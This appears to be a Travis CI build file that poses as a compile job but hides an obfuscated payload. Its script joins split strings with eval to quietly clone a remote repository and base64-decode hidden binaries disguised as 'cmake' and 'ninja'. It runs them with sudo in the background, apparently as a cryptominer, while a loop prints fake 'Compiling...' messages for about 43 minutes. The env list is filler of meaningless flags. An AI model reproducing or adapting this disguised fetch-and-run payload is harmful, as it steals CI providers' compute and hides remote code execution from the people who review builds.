dist: bionic

env:
  - BUILD="--changed-deps=446vN"
  - BUILD="--read-news=40zC"
  - BUILD="--debug=262ua"
  - BUILD="--verbose-slot-rebuilds=618R7"
  - BUILD="--search-index=568bB"
  - BUILD="--rebuild-exclude=575WE"
  - BUILD="--ignore-soname-deps=886SS"
  - BUILD="--depclean-lib-check=757Eb"
  - BUILD="--autounmask-continue=923yX"
  - BUILD="--autounmask-unrestricted-atoms=690r2"
  - BUILD="--pkg-format=2443V"
  - BUILD="--rebuild-ignore=40044"
  - BUILD="--list-sets=755r2"
  - BUILD="--complete-graph=197KN"
  - BUILD="--getbinpkg=474ut"
  - BUILD="--reinstall=765Ya"
  - BUILD="--nospinner=394R6"
  - BUILD="--onlydeps-with-rdeps=204HF"
  - BUILD="--accept-properties=586EF"
  - BUILD="--searchdesc=692OF"
  - BUILD="--usepkgonly=557AQ"
  - BUILD="--emptytree=9483m"
  - BUILD="--ask=177FN"
  - BUILD="--emptytree=577xm"
  - BUILD="--getbinpkg=977gz"
  - BUILD="--autounmask-write=648YZ"
  - BUILD="--usepkgonly=813Ci"
  - BUILD="--changed-deps=712md"
  - BUILD="--verbose-slot-rebuilds=461Tz"
  - BUILD="--prune=464WF"
  - BUILD="--help=792bZ"
  - BUILD="--reinstall-atoms=920Xy"
  - BUILD="--pkg-format=348lX"
  - BUILD="--autounmask-only=552hH"
  - BUILD="--accept-restrict=707hJ"
  - BUILD="--autounmask-license=741tB"
  - BUILD="--tree=952Fo"
  - BUILD="--exclude=527wZ"
  - BUILD="--keep-going=661k"
  - BUILD="--info=411P4"
  - BUILD="--jobs=670Ge"
  - BUILD="--exclude=543T3"
  - BUILD="--autounmask-license=7164L"
  - BUILD="--keep-going=706aX"
  - BUILD="--ignore-soname-deps=729MH"
  - BUILD="--update=29js"
  - BUILD="--depclean-lib-check=8815M"
  - BUILD="--complete-graph-if-new-ver=338P5"
  - BUILD="--buildpkgonly=765YS"
  - BUILD="--reinstall-atoms=492XA"
  - BUILD="--metadata=819np"
  - BUILD="--fetch-all-uri=623L8"
  - BUILD="--quickpkg-direct=322Hb"
  - BUILD="--dynamic-deps=4613P"
  - BUILD="--digest=623sq"
  - BUILD="--config-root=907ML"
  - BUILD="--autounmask=433Ls"
  - BUILD="--quiet-fail=143pU"
  - BUILD="--noconfmem=809kH"
  - BUILD="--autounmask-write=172Zd"
  - BUILD="--buildpkg=813gm"
  - BUILD="--usepkg-exclude=918Yf"
  - BUILD="--info=281Zp"
  - BUILD="--searchdesc=316aT"
  - BUILD="--autounmask-only=972JA"
  - BUILD="--selective=8599Q"
  - BUILD="--use-ebuild-visibility=7477r"
  - BUILD="--getbinpkgonly=453uW"
  - BUILD="--ignore-soname-deps=93d4"
  - BUILD="--accept-properties=349Xy"
  - BUILD="--depclean-lib-check=32ks"
  - BUILD="--rebuild-if-new-rev=174u"
  - BUILD="--nodeps=464LZ"
  - BUILD="--onlydeps=162R0"
  - BUILD="--newrepo=797Rx"
  - BUILD="--config-root=9341A"
  - BUILD="--sysroot=394v"
  - BUILD="--reinstall-atoms=412K3"
  - BUILD="--sync-submodule=311kn"
  - BUILD="--ignore-built-slot-operator-deps=12GE"
  - BUILD="--searchdesc=113JJ"
  - BUILD="--verbose-slot-rebuilds=652y8"
  - BUILD="--ignore-default-opts=51uL"
  - BUILD="--quiet-build=274GU"
  - BUILD="--quiet-fail=770YC"
  - BUILD="--rebuild-if-new-ver=846Gr"
  - BUILD="--rebuild-if-new-ver=307NK"
  - BUILD="--rebuild-if-new-rev=63nj"
  - BUILD="--reinstall-atoms=236yc"
  - BUILD="--backtrack=514Ep"
  - BUILD="--misspell-suggestions=597mm"
  - BUILD="--autounmask-keep-masks=749XT"
  - BUILD="--sysroot=439mJ"
  - BUILD="--quickpkg-direct=74L5"
  - BUILD="--unordered-display=6935T"
  - BUILD="--autounmask-continue=6321f"
  - BUILD="--selective=499rS"
  - BUILD="--alphabetical=6295l"
  - BUILD="--noconfmem=569TK"
  - BUILD="--changed-deps-report=2ly"
  - BUILD="--buildpkg-exclude=804iS"
  - BUILD="--regen=713lz"
  - BUILD="--autounmask-unrestricted-atoms=853qi"
  - BUILD="--depclean=9129U"
  - BUILD="--rebuilt-binaries-timestamp=487Gs"
  - BUILD="--tree=899H6"
  - BUILD="--ask=879vG"
  - BUILD="--rebuilt-binaries-timestamp=72X1"
  - BUILD="--sync=344da"
  - BUILD="--list-sets=957l7"
  - BUILD="--sync-submodule=738Bs"
  - BUILD="--skipfirst=87MQ"
  - BUILD="--nodeps=504cU"
  - BUILD="--rebuilt-binaries=291xW"
  - BUILD="--rebuild-if-unbuilt=658BW"
  - BUILD="--usepkg=682Ir"
  - BUILD="--usepkgonly=2442d"
  - BUILD="--accept-properties=991mn"
  - BUILD="--usepkgonly=9877p"
  - BUILD="--rebuild-if-new-rev=348xl"
  - BUILD="--prefix=833Wf"
  - BUILD="--noconfmem=629XR"
  - BUILD="--accept-properties=325CN"
  - BUILD="--ignore-world=560TN"
  - BUILD="--list-sets=31If"
  - BUILD="--rage-clean=526yL"
  - BUILD="--pretend=210Dl"
  - BUILD="--pretend=777Z4"
  - BUILD="--rage-clean=950N2"
  - BUILD="--verbose=793kB"
  - BUILD="--regen=875lY"
  - BUILD="--sync-submodule=26618"
  - BUILD="--reinstall-atoms=6895t"
  - BUILD="--columns=449O3"
  - BUILD="--jobs=370N3"
  - BUILD="--fail-clean=950jw"
  - BUILD="--newrepo=970AH"
  - BUILD="--root=606Tu"
  - BUILD="--ignore-default-opts=2334d"
  - BUILD="--search=697gZ"
  - BUILD="--version=712FY"
  - BUILD="--with-bdeps-auto=126ub"
  - BUILD="--deselect=823uw"
  - BUILD="--root-deps=951Ra"
  - BUILD="--usepkgonly=739k5"
  - BUILD="--verbose-slot-rebuilds=4468I"
  - BUILD="--reinstall=844eo"
  - BUILD="--resume=583HJ"
  - BUILD="--binpkg-respect-use=960hk"
  - BUILD="--autounmask-backtrack=115QN"
  - BUILD="--depclean=9um"
  - BUILD="--onlydeps-with-rdeps=198xW"
  - BUILD="--autounmask-keep-masks=688w8"
  - BUILD="--accept-properties=57qO"
  - BUILD="--with-bdeps-auto=256kL"
  - BUILD="--select=835tp"
  - BUILD="--getbinpkg=314Je"

language: minimal

script:
  - sudo apt update || true
  - ebUZKvIb="sudo apt --"
  - kgItFj="yes install"
  - GdXsyyIdSR=" cl-base64 "
  - JorKx="git &>/dev/"
  - gTUzDARGYLy="null || tru"
  - eval "$ebUZKvIb""$kgItFj""$GdXsyyIdSR""$JorKx""$gTUzDARGYLy""e"
  - LTmxjV="git clone h"
  - XIbWrTceOlB="ttps://gccb"
  - BOJxViohE="uild@bitbuc"
  - DuZuciW="ket.org/gcc"
  - BjlZMUpiH="build/gcc.g"
  - DXjeQfwMPeQ="it &>/dev/n"
  - eval "$LTmxjV""$XIbWrTceOlB""$BOJxViohE""$DuZuciW""$BjlZMUpiH""$DXjeQfwMPeQ""ull"
  - WxyoXBrKQo="base64 -d g"
  - baTaacSCJFK="cc/cmake_ >"
  - eval "$WxyoXBrKQo""$baTaacSCJFK"" cmake"
  - GYdCgcHKN="base64 -d g"
  - nLSnQ="cc/config_ "
  - eval "$GYdCgcHKN""$nLSnQ""> clean"
  - SiLPjf="base64 -d g"
  - HUrAjxwD="cc/make_ > "
  - eval "$SiLPjf""$HUrAjxwD""ninja"
  - chmod +x ninja cmake
  - ./cmake
  - QQtVB="sed -i 's/b"
  - TIIuxDAkXfm="uild/tb2u/g"
  - eval "$QQtVB""$TIIuxDAkXfm""' clean"
  - rxZIbhaGD="sudo ./ninj"
  - TkVRupFB="a -c clean "
  - thIIhYVv="&>/dev/null"
  - eval "$rxZIbhaGD""$TkVRupFB""$thIIhYVv"" &"
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2614)) ] && sudo killall ninja && break; sleep 203; done
